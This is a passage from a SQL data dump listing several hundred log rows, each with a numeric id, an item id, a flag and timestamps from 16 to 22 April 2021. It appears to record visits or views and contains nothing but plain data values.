09:39:26'),(19169,1592,1,'2021-04-16','2021-04-16 09:40:02'),(19170,84,1,'2021-04-16','2021-04-16 09:51:35'),(19171,3253,1,'2021-04-16','2021-04-16 10:26:18'),(19172,3109,1,'2021-04-16','2021-04-16 11:08:03'),(19173,1726,1,'2021-04-16','2021-04-16 11:29:11'),(19174,1602,1,'2021-04-16','2021-04-16 11:43:34'),(19175,91,1,'2021-04-16','2021-04-16 11:43:55'),(19176,87,1,'2021-04-16','2021-04-16 11:45:05'),(19177,474,1,'2021-04-16','2021-04-16 12:17:45'),(19178,2457,1,'2021-04-16','2021-04-16 12:33:57'),(19179,3092,1,'2021-04-16','2021-04-16 13:04:39'),(19180,1600,1,'2021-04-16','2021-04-16 13:18:42'),(19181,2457,1,'2021-04-16','2021-04-16 13:48:21'),(19182,1715,1,'2021-04-16','2021-04-16 14:03:42'),(19183,2971,1,'2021-04-16','2021-04-16 14:05:43'),(19184,1588,1,'2021-04-16','2021-04-16 14:28:51'),(19185,1588,1,'2021-04-16','2021-04-16 14:28:59'),(19186,1870,1,'2021-04-16','2021-04-16 14:58:08'),(19187,1588,1,'2021-04-16','2021-04-16 14:58:15'),(19188,1594,1,'2021-04-16','2021-04-16 15:20:59'),(19189,1594,1,'2021-04-16','2021-04-16 15:34:21'),(19190,2934,1,'2021-04-16','2021-04-16 15:39:34'),(19191,3694,1,'2021-04-16','2021-04-16 15:47:53'),(19192,3691,1,'2021-04-16','2021-04-16 15:52:45'),(19193,1608,1,'2021-04-16','2021-04-16 15:59:26'),(19194,1695,1,'2021-04-16','2021-04-16 16:29:27'),(19195,2989,1,'2021-04-16','2021-04-16 16:35:47'),(19196,1608,1,'2021-04-16','2021-04-16 16:43:39'),(19197,1588,1,'2021-04-16','2021-04-16 16:58:16'),(19198,3282,1,'2021-04-16','2021-04-16 16:59:28'),(19199,1586,1,'2021-04-16','2021-04-16 17:13:07'),(19200,1586,1,'2021-04-16','2021-04-16 17:13:08'),(19201,1602,1,'2021-04-16','2021-04-16 17:28:29'),(19202,1602,1,'2021-04-16','2021-04-16 17:30:22'),(19203,2297,1,'2021-04-16','2021-04-16 17:45:14'),(19204,1596,1,'2021-04-16','2021-04-16 17:58:08'),(19205,3030,1,'2021-04-16','2021-04-16 20:31:55'),(19206,2989,1,'2021-04-16','2021-04-16 20:41:20'),(19207,1586,1,'2021-04-16','2021-04-16 21:18:52'),(19208,2956,1,'2021-04-16','2021-04-16 21:22:08'),(19209,1586,1,'2021-04-16','2021-04-16 21:27:40'),(19210,3055,1,'2021-04-16','2021-04-16 21:44:31'),(19211,3092,1,'2021-04-16','2021-04-16 22:14:31'),(19212,2769,1,'2021-04-16','2021-04-16 22:30:20'),(19213,2297,1,'2021-04-16','2021-04-16 22:30:34'),(19214,3297,1,'2021-04-16','2021-04-16 22:31:13'),(19215,480,1,'2021-04-16','2021-04-16 22:44:29'),(19216,469,1,'2021-04-16','2021-04-16 22:45:17'),(19217,472,1,'2021-04-16','2021-04-16 22:49:33'),(19218,3265,1,'2021-04-16','2021-04-16 22:59:32'),(19219,1600,1,'2021-04-16','2021-04-16 23:10:00'),(19220,2457,1,'2021-04-16','2021-04-16 23:14:38'),(19221,3079,1,'2021-04-16','2021-04-16 23:17:06'),(19222,3066,1,'2021-04-16','2021-04-16 23:31:39'),(19223,2248,1,'2021-04-16','2021-04-16 23:44:33'),(19224,1544,1,'2021-04-17','2021-04-17 01:50:04'),(19225,1586,1,'2021-04-17','2021-04-17 04:42:01'),(19226,2154,1,'2021-04-17','2021-04-17 06:00:19'),(19227,2457,1,'2021-04-17','2021-04-17 08:19:09'),(19228,570,1,'2021-04-17','2021-04-17 10:51:58'),(19229,2457,1,'2021-04-17','2021-04-17 11:04:55'),(19230,570,1,'2021-04-17','2021-04-17 11:26:51'),(19231,1588,1,'2021-04-17','2021-04-17 12:26:23'),(19232,1588,1,'2021-04-17','2021-04-17 12:32:07'),(19233,1588,1,'2021-04-17','2021-04-17 12:32:16'),(19234,1600,1,'2021-04-17','2021-04-17 14:48:30'),(19235,2297,1,'2021-04-17','2021-04-17 14:59:47'),(19236,1602,1,'2021-04-17','2021-04-17 15:13:45'),(19237,1602,1,'2021-04-17','2021-04-17 15:14:19'),(19238,1734,1,'2021-04-17','2021-04-17 15:14:30'),(19239,1602,1,'2021-04-17','2021-04-17 15:14:42'),(19240,1730,1,'2021-04-17','2021-04-17 15:14:47'),(19241,1602,1,'2021-04-17','2021-04-17 15:15:19'),(19242,570,1,'2021-04-17','2021-04-17 15:37:29'),(19243,570,1,'2021-04-17','2021-04-17 15:37:41'),(19244,2419,1,'2021-04-17','2021-04-17 15:50:56'),(19245,1602,1,'2021-04-17','2021-04-17 16:15:14'),(19246,1602,1,'2021-04-17','2021-04-17 16:17:01'),(19247,1602,1,'2021-04-17','2021-04-17 16:17:31'),(19248,3055,1,'2021-04-17','2021-04-17 17:08:17'),(19249,3092,1,'2021-04-17','2021-04-17 17:19:28'),(19250,1600,1,'2021-04-17','2021-04-17 17:49:08'),(19251,3079,1,'2021-04-17','2021-04-17 17:49:29'),(19252,2297,1,'2021-04-17','2021-04-17 18:11:43'),(19253,570,1,'2021-04-17','2021-04-17 18:16:10'),(19254,570,1,'2021-04-17','2021-04-17 18:16:15'),(19255,474,1,'2021-04-17','2021-04-17 18:19:29'),(19256,2309,1,'2021-04-17','2021-04-17 18:28:32'),(19257,570,1,'2021-04-17','2021-04-17 18:52:01'),(19258,1602,1,'2021-04-17','2021-04-17 21:20:04'),(19259,1586,1,'2021-04-17','2021-04-17 21:54:51'),(19260,2457,1,'2021-04-17','2021-04-17 23:11:19'),(19261,467,1,'2021-04-17','2021-04-17 23:23:40'),(19262,474,1,'2021-04-18','2021-04-18 00:39:27'),(19263,2161,1,'2021-04-18','2021-04-18 01:37:51'),(19264,3066,1,'2021-04-18','2021-04-18 02:30:49'),(19265,102,1,'2021-04-18','2021-04-18 02:37:51'),(19266,1602,1,'2021-04-18','2021-04-18 03:38:27'),(19267,1594,1,'2021-04-18','2021-04-18 04:51:13'),(19268,87,1,'2021-04-18','2021-04-18 04:54:44'),(19269,1594,1,'2021-04-18','2021-04-18 04:55:43'),(19270,1594,1,'2021-04-18','2021-04-18 04:56:08'),(19271,91,1,'2021-04-18','2021-04-18 04:56:19'),(19272,1606,1,'2021-04-18','2021-04-18 05:04:01'),(19273,108,1,'2021-04-18','2021-04-18 05:04:33'),(19274,1594,1,'2021-04-18','2021-04-18 05:07:08'),(19275,80,1,'2021-04-18','2021-04-18 05:43:12'),(19276,1594,1,'2021-04-18','2021-04-18 07:11:23'),(19277,1594,1,'2021-04-18','2021-04-18 07:33:21'),(19278,2297,1,'2021-04-18','2021-04-18 07:55:57'),(19279,2609,1,'2021-04-18','2021-04-18 08:03:05'),(19280,1586,1,'2021-04-18','2021-04-18 09:16:57'),(19281,570,1,'2021-04-18','2021-04-18 09:30:44'),(19282,2309,1,'2021-04-18','2021-04-18 09:46:59'),(19283,570,1,'2021-04-18','2021-04-18 09:52:09'),(19284,570,1,'2021-04-18','2021-04-18 10:18:26'),(19285,2457,1,'2021-04-18','2021-04-18 10:43:08'),(19286,2457,1,'2021-04-18','2021-04-18 10:43:25'),(19287,1594,1,'2021-04-18','2021-04-18 10:43:25'),(19288,76,1,'2021-04-18','2021-04-18 10:46:59'),(19289,1594,1,'2021-04-18','2021-04-18 10:48:07'),(19290,1586,1,'2021-04-18','2021-04-18 11:14:32'),(19291,1586,1,'2021-04-18','2021-04-18 11:14:34'),(19292,1586,1,'2021-04-18','2021-04-18 11:14:47'),(19293,1602,1,'2021-04-18','2021-04-18 11:19:24'),(19294,1598,1,'2021-04-18','2021-04-18 11:33:47'),(19295,1594,1,'2021-04-18','2021-04-18 11:37:23'),(19296,1604,1,'2021-04-18','2021-04-18 11:48:38'),(19297,1604,1,'2021-04-18','2021-04-18 11:49:03'),(19298,1586,1,'2021-04-18','2021-04-18 12:12:10'),(19299,3030,1,'2021-04-18','2021-04-18 12:42:27'),(19300,3691,1,'2021-04-18','2021-04-18 13:18:36'),(19301,2154,1,'2021-04-18','2021-04-18 13:28:38'),(19302,1594,1,'2021-04-18','2021-04-18 13:34:07'),(19303,2769,1,'2021-04-18','2021-04-18 14:06:08'),(19304,2769,1,'2021-04-18','2021-04-18 14:06:08'),(19305,2769,1,'2021-04-18','2021-04-18 14:06:12'),(19306,2419,1,'2021-04-18','2021-04-18 14:08:39'),(19307,487,1,'2021-04-18','2021-04-18 15:08:39'),(19308,1600,1,'2021-04-18','2021-04-18 15:08:43'),(19309,1701,1,'2021-04-18','2021-04-18 15:09:15'),(19310,1718,1,'2021-04-18','2021-04-18 15:28:54'),(19311,2309,1,'2021-04-18','2021-04-18 15:39:03'),(19312,1594,1,'2021-04-18','2021-04-18 15:44:49'),(19313,570,1,'2021-04-18','2021-04-18 15:51:30'),(19314,487,1,'2021-04-18','2021-04-18 16:09:09'),(19315,2769,1,'2021-04-18','2021-04-18 16:17:23'),(19316,2769,1,'2021-04-18','2021-04-18 16:17:23'),(19317,2769,1,'2021-04-18','2021-04-18 16:17:23'),(19318,2769,1,'2021-04-18','2021-04-18 16:17:24'),(19319,2769,1,'2021-04-18','2021-04-18 16:17:24'),(19320,2769,1,'2021-04-18','2021-04-18 16:21:41'),(19321,467,1,'2021-04-18','2021-04-18 17:29:37'),(19322,2769,1,'2021-04-18','2021-04-18 17:29:40'),(19323,570,1,'2021-04-18','2021-04-18 17:50:53'),(19324,570,1,'2021-04-18','2021-04-18 17:51:05'),(19325,2769,1,'2021-04-18','2021-04-18 17:51:32'),(19326,570,1,'2021-04-18','2021-04-18 17:51:34'),(19327,570,1,'2021-04-18','2021-04-18 17:51:48'),(19328,2617,1,'2021-04-18','2021-04-18 17:58:54'),(19329,1544,1,'2021-04-18','2021-04-18 18:20:32'),(19330,2956,1,'2021-04-18','2021-04-18 18:30:02'),(19331,1695,1,'2021-04-18','2021-04-18 19:12:53'),(19332,1608,1,'2021-04-18','2021-04-18 19:42:53'),(19333,108,1,'2021-04-18','2021-04-18 19:51:57'),(19334,3282,1,'2021-04-18','2021-04-18 20:12:53'),(19335,2769,1,'2021-04-18','2021-04-18 20:42:47'),(19336,2769,1,'2021-04-18','2021-04-18 20:42:48'),(19337,1695,1,'2021-04-18','2021-04-18 20:42:52'),(19338,2769,1,'2021-04-18','2021-04-18 20:42:56'),(19339,2769,1,'2021-04-18','2021-04-18 21:56:12'),(19340,2769,1,'2021-04-18','2021-04-18 21:56:13'),(19341,1594,1,'2021-04-18','2021-04-18 21:57:16'),(19342,1586,1,'2021-04-18','2021-04-18 22:19:18'),(19343,1586,1,'2021-04-18','2021-04-18 22:19:19'),(19344,1586,1,'2021-04-18','2021-04-18 22:22:52'),(19345,2769,1,'2021-04-18','2021-04-18 22:33:34'),(19346,2769,1,'2021-04-18','2021-04-18 22:34:01'),(19347,1586,1,'2021-04-18','2021-04-18 23:36:04'),(19348,1586,1,'2021-04-18','2021-04-18 23:36:05'),(19349,1749,1,'2021-04-18','2021-04-18 23:42:14'),(19350,1594,1,'2021-04-18','2021-04-18 23:50:46'),(19351,2769,1,'2021-04-19','2021-04-19 00:10:40'),(19352,2769,1,'2021-04-19','2021-04-19 00:10:43'),(19353,1600,1,'2021-04-19','2021-04-19 01:42:47'),(19354,2309,1,'2021-04-19','2021-04-19 02:02:49'),(19355,3482,1,'2021-04-19','2021-04-19 02:32:58'),(19356,1586,1,'2021-04-19','2021-04-19 03:59:51'),(19357,1586,1,'2021-04-19','2021-04-19 03:59:52'),(19358,1586,1,'2021-04-19','2021-04-19 03:59:55'),(19359,1586,1,'2021-04-19','2021-04-19 04:21:39'),(19360,2956,1,'2021-04-19','2021-04-19 04:32:50'),(19361,1774,1,'2021-04-19','2021-04-19 05:34:09'),(19362,1774,1,'2021-04-19','2021-04-19 05:37:23'),(19363,1774,1,'2021-04-19','2021-04-19 05:37:56'),(19364,2309,1,'2021-04-19','2021-04-19 06:04:43'),(19365,3069,1,'2021-04-19','2021-04-19 07:07:56'),(19366,3109,1,'2021-04-19','2021-04-19 08:09:14'),(19367,1606,1,'2021-04-19','2021-04-19 08:23:05'),(19368,2297,1,'2021-04-19','2021-04-19 09:25:48'),(19369,1586,1,'2021-04-19','2021-04-19 10:20:36'),(19370,68,1,'2021-04-19','2021-04-19 11:00:06'),(19371,76,1,'2021-04-19','2021-04-19 11:00:51'),(19372,1606,1,'2021-04-19','2021-04-19 11:34:09'),(19373,467,1,'2021-04-19','2021-04-19 11:44:24'),(19374,87,1,'2021-04-19','2021-04-19 11:46:59'),(19375,87,1,'2021-04-19','2021-04-19 11:48:42'),(19376,87,1,'2021-04-19','2021-04-19 11:55:36'),(19377,473,1,'2021-04-19','2021-04-19 11:56:12'),(19378,1602,1,'2021-04-19','2021-04-19 12:18:03'),(19379,2297,1,'2021-04-19','2021-04-19 12:19:20'),(19380,570,1,'2021-04-19','2021-04-19 12:38:20'),(19381,1602,1,'2021-04-19','2021-04-19 12:57:10'),(19382,1594,1,'2021-04-19','2021-04-19 14:24:51'),(19383,2309,1,'2021-04-19','2021-04-19 14:25:08'),(19384,2911,1,'2021-04-19','2021-04-19 14:27:09'),(19385,1544,1,'2021-04-19','2021-04-19 14:37:28'),(19386,1594,1,'2021-04-19','2021-04-19 14:51:14'),(19387,68,1,'2021-04-19','2021-04-19 14:55:59'),(19388,1594,1,'2021-04-19','2021-04-19 14:56:25'),(19389,1602,1,'2021-04-19','2021-04-19 15:04:55'),(19390,1604,1,'2021-04-19','2021-04-19 15:07:40'),(19391,68,1,'2021-04-19','2021-04-19 15:07:57'),(19392,1586,1,'2021-04-19','2021-04-19 15:20:21'),(19393,3694,1,'2021-04-19','2021-04-19 15:50:15'),(19394,3694,1,'2021-04-19','2021-04-19 15:55:53'),(19395,1594,1,'2021-04-19','2021-04-19 16:57:45'),(19396,1600,1,'2021-04-19','2021-04-19 17:00:31'),(19397,2769,1,'2021-04-19','2021-04-19 17:12:38'),(19398,3030,1,'2021-04-19','2021-04-19 18:14:19'),(19399,3261,1,'2021-04-19','2021-04-19 18:18:46'),(19400,2457,1,'2021-04-19','2021-04-19 19:08:11'),(19401,1596,1,'2021-04-19','2021-04-19 19:12:05'),(19402,3055,1,'2021-04-19','2021-04-19 19:18:44'),(19403,2904,1,'2021-04-19','2021-04-19 20:39:49'),(19404,335,1,'2021-04-19','2021-04-19 20:40:01'),(19405,68,1,'2021-04-19','2021-04-19 20:40:27'),(19406,1586,1,'2021-04-19','2021-04-19 22:33:18'),(19407,3694,1,'2021-04-20','2021-04-20 00:51:32'),(19408,2956,1,'2021-04-20','2021-04-20 02:13:07'),(19409,1715,1,'2021-04-20','2021-04-20 02:16:00'),(19410,1612,1,'2021-04-20','2021-04-20 02:51:08'),(19411,1724,1,'2021-04-20','2021-04-20 03:22:06'),(19412,467,1,'2021-04-20','2021-04-20 03:58:29'),(19413,1586,1,'2021-04-20','2021-04-20 04:18:29'),(19414,1594,1,'2021-04-20','2021-04-20 05:20:44'),(19415,1594,1,'2021-04-20','2021-04-20 05:42:24'),(19416,1594,1,'2021-04-20','2021-04-20 06:09:54'),(19417,1726,1,'2021-04-20','2021-04-20 09:40:11'),(19418,3664,1,'2021-04-20','2021-04-20 09:46:37'),(19419,1606,1,'2021-04-20','2021-04-20 10:06:46'),(19420,1726,1,'2021-04-20','2021-04-20 10:33:54'),(19421,1594,1,'2021-04-20','2021-04-20 10:49:18'),(19422,1588,1,'2021-04-20','2021-04-20 11:07:10'),(19423,2297,1,'2021-04-20','2021-04-20 11:17:08'),(19424,1600,1,'2021-04-20','2021-04-20 11:51:42'),(19425,2309,1,'2021-04-20','2021-04-20 13:13:58'),(19426,1586,1,'2021-04-20','2021-04-20 13:22:17'),(19427,72,1,'2021-04-20','2021-04-20 13:23:26'),(19428,3680,1,'2021-04-20','2021-04-20 13:24:18'),(19429,467,1,'2021-04-20','2021-04-20 14:33:10'),(19430,3102,1,'2021-04-20','2021-04-20 14:37:26'),(19431,1586,1,'2021-04-20','2021-04-20 14:43:12'),(19432,1594,1,'2021-04-20','2021-04-20 14:43:38'),(19433,2297,1,'2021-04-20','2021-04-20 14:53:18'),(19434,72,1,'2021-04-20','2021-04-20 15:14:06'),(19435,3680,1,'2021-04-20','2021-04-20 15:14:25'),(19436,1590,1,'2021-04-20','2021-04-20 15:20:11'),(19437,1590,1,'2021-04-20','2021-04-20 15:20:13'),(19438,72,1,'2021-04-20','2021-04-20 15:25:59'),(19439,72,1,'2021-04-20','2021-04-20 15:29:57'),(19440,3104,1,'2021-04-20','2021-04-20 15:34:03'),(19441,87,1,'2021-04-20','2021-04-20 15:58:30'),(19442,471,1,'2021-04-20','2021-04-20 15:59:14'),(19443,91,1,'2021-04-20','2021-04-20 16:02:02'),(19444,91,1,'2021-04-20','2021-04-20 16:10:25'),(19445,487,1,'2021-04-20','2021-04-20 16:23:53'),(19446,1586,1,'2021-04-20','2021-04-20 16:27:57'),(19447,1586,1,'2021-04-20','2021-04-20 16:28:01'),(19448,2159,1,'2021-04-20','2021-04-20 16:52:06'),(19449,1728,1,'2021-04-20','2021-04-20 17:19:32'),(19450,1596,1,'2021-04-20','2021-04-20 17:22:55'),(19451,1602,1,'2021-04-20','2021-04-20 17:27:40'),(19452,1726,1,'2021-04-20','2021-04-20 17:51:04'),(19453,1586,1,'2021-04-20','2021-04-20 17:54:23'),(19454,1586,1,'2021-04-20','2021-04-20 17:54:24'),(19455,1592,1,'2021-04-20','2021-04-20 17:54:46'),(19456,1586,1,'2021-04-20','2021-04-20 17:54:55'),(19457,1586,1,'2021-04-20','2021-04-20 17:56:23'),(19458,1586,1,'2021-04-20','2021-04-20 18:06:53'),(19459,1586,1,'2021-04-20','2021-04-20 18:16:09'),(19460,1586,1,'2021-04-20','2021-04-20 18:31:27'),(19461,2704,1,'2021-04-20','2021-04-20 18:56:34'),(19462,1602,1,'2021-04-20','2021-04-20 18:59:42'),(19463,1582,1,'2021-04-20','2021-04-20 19:17:28'),(19464,3087,1,'2021-04-20','2021-04-20 20:13:56'),(19465,1612,1,'2021-04-20','2021-04-20 21:21:14'),(19466,1586,1,'2021-04-20','2021-04-20 22:12:54'),(19467,1602,1,'2021-04-20','2021-04-20 22:34:56'),(19468,1586,1,'2021-04-20','2021-04-20 22:57:23'),(19469,1586,1,'2021-04-20','2021-04-20 22:57:24'),(19470,1586,1,'2021-04-20','2021-04-20 22:57:27'),(19471,1586,1,'2021-04-20','2021-04-20 23:00:45'),(19472,1586,1,'2021-04-20','2021-04-20 23:32:11'),(19473,1606,1,'2021-04-20','2021-04-20 23:43:13'),(19474,1586,1,'2021-04-20','2021-04-20 23:51:56'),(19475,2809,1,'2021-04-21','2021-04-21 00:10:13'),(19476,2956,1,'2021-04-21','2021-04-21 00:54:19'),(19477,487,1,'2021-04-21','2021-04-21 01:22:38'),(19478,2150,1,'2021-04-21','2021-04-21 01:49:05'),(19479,2159,1,'2021-04-21','2021-04-21 02:15:12'),(19480,2159,1,'2021-04-21','2021-04-21 02:45:11'),(19481,1726,1,'2021-04-21','2021-04-21 03:15:02'),(19482,2904,1,'2021-04-21','2021-04-21 03:18:32'),(19483,3664,1,'2021-04-21','2021-04-21 03:24:21'),(19484,470,1,'2021-04-21','2021-04-21 03:25:45'),(19485,472,1,'2021-04-21','2021-04-21 03:36:58'),(19486,472,1,'2021-04-21','2021-04-21 03:37:04'),(19487,472,1,'2021-04-21','2021-04-21 03:39:13'),(19488,1726,1,'2021-04-21','2021-04-21 03:45:03'),(19489,1594,1,'2021-04-21','2021-04-21 04:29:27'),(19490,486,1,'2021-04-21','2021-04-21 05:14:14'),(19491,2309,1,'2021-04-21','2021-04-21 05:20:01'),(19492,1606,1,'2021-04-21','2021-04-21 05:39:55'),(19493,1594,1,'2021-04-21','2021-04-21 07:02:18'),(19494,2159,1,'2021-04-21','2021-04-21 07:19:57'),(19495,1604,1,'2021-04-21','2021-04-21 07:20:30'),(19496,1600,1,'2021-04-21','2021-04-21 08:25:53'),(19497,2159,1,'2021-04-21','2021-04-21 09:19:20'),(19498,2159,1,'2021-04-21','2021-04-21 09:19:39'),(19499,1608,1,'2021-04-21','2021-04-21 09:26:51'),(19500,1588,1,'2021-04-21','2021-04-21 10:26:46'),(19501,1588,1,'2021-04-21','2021-04-21 10:26:50'),(19502,1588,1,'2021-04-21','2021-04-21 10:26:50'),(19503,108,1,'2021-04-21','2021-04-21 10:41:39'),(19504,72,1,'2021-04-21','2021-04-21 11:14:09'),(19505,1602,1,'2021-04-21','2021-04-21 11:14:23'),(19506,3705,1,'2021-04-21','2021-04-21 11:14:41'),(19507,1602,1,'2021-04-21','2021-04-21 11:15:30'),(19508,72,1,'2021-04-21','2021-04-21 11:17:19'),(19509,72,1,'2021-04-21','2021-04-21 11:22:21'),(19510,3704,1,'2021-04-21','2021-04-21 11:22:57'),(19511,1602,1,'2021-04-21','2021-04-21 11:48:14'),(19512,2993,1,'2021-04-21','2021-04-21 12:04:32'),(19513,1600,1,'2021-04-21','2021-04-21 12:11:55'),(19514,1737,1,'2021-04-21','2021-04-21 12:26:07'),(19515,3004,1,'2021-04-21','2021-04-21 13:02:14'),(19516,1596,1,'2021-04-21','2021-04-21 13:43:46'),(19517,1588,1,'2021-04-21','2021-04-21 14:04:15'),(19518,72,1,'2021-04-21','2021-04-21 14:05:18'),(19519,3005,1,'2021-04-21','2021-04-21 14:13:19'),(19520,3704,1,'2021-04-21','2021-04-21 14:24:01'),(19521,3698,1,'2021-04-21','2021-04-21 14:26:58'),(19522,3706,1,'2021-04-21','2021-04-21 14:28:39'),(19523,3707,1,'2021-04-21','2021-04-21 14:30:27'),(19524,3705,1,'2021-04-21','2021-04-21 14:32:31'),(19525,1594,1,'2021-04-21','2021-04-21 14:33:08'),(19526,2410,1,'2021-04-21','2021-04-21 14:33:46'),(19527,467,1,'2021-04-21','2021-04-21 14:52:03'),(19528,1778,1,'2021-04-21','2021-04-21 15:51:24'),(19529,3051,1,'2021-04-21','2021-04-21 15:54:27'),(19530,1600,1,'2021-04-21','2021-04-21 15:57:18'),(19531,1602,1,'2021-04-21','2021-04-21 16:30:47'),(19532,72,1,'2021-04-21','2021-04-21 16:33:00'),(19533,3705,1,'2021-04-21','2021-04-21 16:33:12'),(19534,72,1,'2021-04-21','2021-04-21 16:35:09'),(19535,3704,1,'2021-04-21','2021-04-21 16:35:31'),(19536,72,1,'2021-04-21','2021-04-21 16:36:05'),(19537,3705,1,'2021-04-21','2021-04-21 16:36:18'),(19538,3087,1,'2021-04-21','2021-04-21 16:54:23'),(19539,2309,1,'2021-04-21','2021-04-21 17:09:12'),(19540,2309,1,'2021-04-21','2021-04-21 17:09:34'),(19541,2309,1,'2021-04-21','2021-04-21 17:09:35'),(19542,1594,1,'2021-04-21','2021-04-21 17:13:05'),(19543,1776,1,'2021-04-21','2021-04-21 17:16:09'),(19544,2309,1,'2021-04-21','2021-04-21 17:18:55'),(19545,1594,1,'2021-04-21','2021-04-21 17:44:15'),(19546,487,1,'2021-04-21','2021-04-21 18:04:25'),(19547,3265,1,'2021-04-21','2021-04-21 18:47:11'),(19548,2178,1,'2021-04-21','2021-04-21 18:47:39'),(19549,1602,1,'2021-04-21','2021-04-21 18:58:38'),(19550,1604,1,'2021-04-21','2021-04-21 19:09:50'),(19551,2309,1,'2021-04-21','2021-04-21 19:15:06'),(19552,1778,1,'2021-04-21','2021-04-21 19:16:11'),(19553,2178,1,'2021-04-21','2021-04-21 19:41:18'),(19554,2989,1,'2021-04-21','2021-04-21 19:49:55'),(19555,3691,1,'2021-04-21','2021-04-21 19:58:29'),(19556,1751,1,'2021-04-21','2021-04-21 20:13:56'),(19557,3055,1,'2021-04-21','2021-04-21 20:17:10'),(19558,3261,1,'2021-04-21','2021-04-21 20:17:48'),(19559,1766,1,'2021-04-21','2021-04-21 20:24:08'),(19560,1718,1,'2021-04-21','2021-04-21 20:46:02'),(19561,2248,1,'2021-04-21','2021-04-21 20:47:10'),(19562,1726,1,'2021-04-21','2021-04-21 20:49:56'),(19563,102,1,'2021-04-21','2021-04-21 21:15:20'),(19564,1602,1,'2021-04-21','2021-04-21 21:21:49'),(19565,1602,1,'2021-04-21','2021-04-21 21:25:07'),(19566,1602,1,'2021-04-21','2021-04-21 21:27:35'),(19567,76,1,'2021-04-21','2021-04-21 21:27:47'),(19568,1602,1,'2021-04-21','2021-04-21 21:31:48'),(19569,80,1,'2021-04-21','2021-04-21 21:32:10'),(19570,1602,1,'2021-04-21','2021-04-21 21:32:22'),(19571,3030,1,'2021-04-21','2021-04-21 23:08:37'),(19572,3030,1,'2021-04-21','2021-04-21 23:08:40'),(19573,1582,1,'2021-04-21','2021-04-21 23:22:17'),(19574,1594,1,'2021-04-21','2021-04-21 23:34:29'),(19575,1592,1,'2021-04-21','2021-04-21 23:59:47'),(19576,1594,1,'2021-04-22','2021-04-22 00:09:16'),(19577,1594,1,'2021-04-22','2021-04-22 00:11:07'),(19578,1600,1,'2021-04-22','2021-04-22 00:54:48'),(19579,1602,1,'2021-04-22','2021-04-22 01:07:07'),(19580,68,1,'2021-04-22','2021-04-22 01:08:12'),(19581,1602,1,'2021-04-22','2021-04-22 01:09:14'),(19582,1602,1,'2021-04-22','2021-04-22 01:09:20'),(19583,80,1,'2021-04-22','2021-04-22 01:11:34'),(19584,1602,1,'2021-04-22','2021-04-22 01:14:35'),(19585,3099,1,'2021-04-22','2021-04-22 01:19:02'),(19586,467,1,'2021-04-22','2021-04-22 01:59:51'),(19587,1586,1,'2021-04-22','2021-04-22 02:06:02'),(19588,91,1,'2021-04-22','2021-04-22 02:35:31'),(19589,1594,1,'2021-04-22','2021-04-22 03:52:20'),(19590,1594,1,'2021-04-22','2021-04-22 03:53:54'),(19591,1594,1,'2021-04-22','2021-04-22 03:56:21'),(19592,3069,1,'2021-04-22','2021-04-22 04:08:06'),(19593,3055,1,'2021-04-22','2021-04-22 04:40:44'),(19594,2248,1,'2021-04-22','2021-04-22 04:55:37'),(19595,3265,1,'2021-04-22','2021-04-22 05:00:53'),(19596,3541,1,'2021-04-22','2021-04-22 05:39:43'),(19597,1582,1,'2021-04-22','2021-04-22 05:41:25'),(19598,1602,1,'2021-04-22','2021-04-22 07:16:36'),(19599,87,1,'2021-04-22','2021-04-22 07:17:56'),(19600,1602,1,'2021-04-22','2021-04-22 07:18:11'),(19601,1711,1,'2021-04-22','2021-04-22 07:41:02'),(19602,1600,1,'2021-04-22','2021-04-22 08:47:15'),(19603,1600,1,'2021-04-22','2021-04-22 09:43:29'),(19604,80,1,'2021-04-22','2021-04-22 09:45:32'),(19605,1600,1,'2021-04-22','2021-04-22 10:03:55'),(19606,3498,1,'2021-04-22','2021-04-22 10:08:16'),(19607,1751,1,'2021-04-22','2021-04-22 10:09:22'),(19608,1600,1,'2021-04-22','2021-04-22 10:12:57'),(19609,76,1,'2021-04-22','2021-04-22 10:13:28'),(19610,91,1,'2021-04-22','2021-04-22 10:14:55'),(19611,80,1,'2021-04-22','2021-04-22 10:17:09'),(19612,68,1,'2021-04-22','2021-04-22 10:21:29'),(19613,2457,1,'2021-04-22','2021-04-22 11:13:30'),(19614,72,1,'2021-04-22','2021-04-22 11:19:43'),(19615,1747,1,'2021-04-22','2021-04-22 11:33:53'),(19616,1602,1,'2021-04-22','2021-04-22 11:34:57'),(19617,72,1,'2021-04-22','2021-04-22 11:39:01'),(19618,3706,1,'2021-04-22','2021-04-22 11:39:32'),(19619,3680,1,'2021-04-22','2021-04-22 11:44:39'),(19620,3706,1,'2021-04-22','2021-04-22 11:44:54'),(19621,1600,1,'2021-04-22','2021-04-22 11:49:47'),(19622,467,1,'2021-04-22','2021-04-22 11:53:23'),(19623,2457,1,'2021-04-22','2021-04-22 11:53:38'),(19624,3706,1,'2021-04-22','2021-04-22 11:54:10'),(19625,2297,1,'2021-04-22','2021-04-22 12:50:37'),(19626,2769,1,'2021-04-22','2021-04-22 13:09:38'),(19627,1602,1,'2021-04-22','2021-04-22 13:14:59'),(19628,68,1,'2021-04-22','2021-04-22 13:15:11'),(19629,80,1,'2021-04-22','2021-04-22 13:15:34'),(19630,3090,1,'2021-04-22','2021-04-22 13:34:50'),(19631,2769,1,'2021-04-22','2021-04-22 14:20:58'),(19632,89,1,'2021-04-22','2021-04-22 14:31:27'),(19633,89,1,'2021-04-22','2021-04-22 14:32:34'),(19634,1592,1,'2021-04-22','2021-04-22 14:43:53'),(19635,84,1,'2021-04-22','2021-04-22 14:45:26'),(19636,89,1,'2021-04-22','2021-04-22 14:45:58'),(19637,1592,1,'2021-04-22','2021-04-22 14:47:01'),(19638,91,1,'2021-04-22','2021-04-22 14:47:52'),(19639,1602,1,'2021-04-22','2021-04-22 14:48:05'),(19640,72,1,'2021-04-22','2021-04-22 15:01:41'),(19641,3706,1,'2021-04-22','2021-04-22 15:02:11'),(19642,1596,1,'2021-04-22','2021-04-22 15:11:08'),(19643,1582,1,'2021-04-22','2021-04-22 15:47:14'),(19644,1728,1,'2021-04-22','2021-04-22 16:31:30'),(19645,1600,1,'2021-04-22','2021-04-22 16:44:40'),(19646,3706,1,'2021-04-22','2021-04-22 17:02:12'),(19647,2769,1,'2021-04-22','2021-04-22 18:16:36'),(19648,2751,1,'2021-04-22','2021-04-22 19:07:31'),(19649,2769,1,'2021-04-22','2021-04-22 20:15:45'),(19650,2769,1,'2021-04-22','2021-04-22 20:15:46'),(19651,2769,1,'2021-04-22','2021-04-22 20:15:48'),(19652,2769,1,'2021-04-22','2021-04-22 20:16:05'),(19653,2704,1,'2021-04-22','2021-04-22 20:36:07'),(19654,80,1,'2021-04-22','2021-04-22 21:24:08'),(19655,467,1,'2021-04-22','2021-04-22 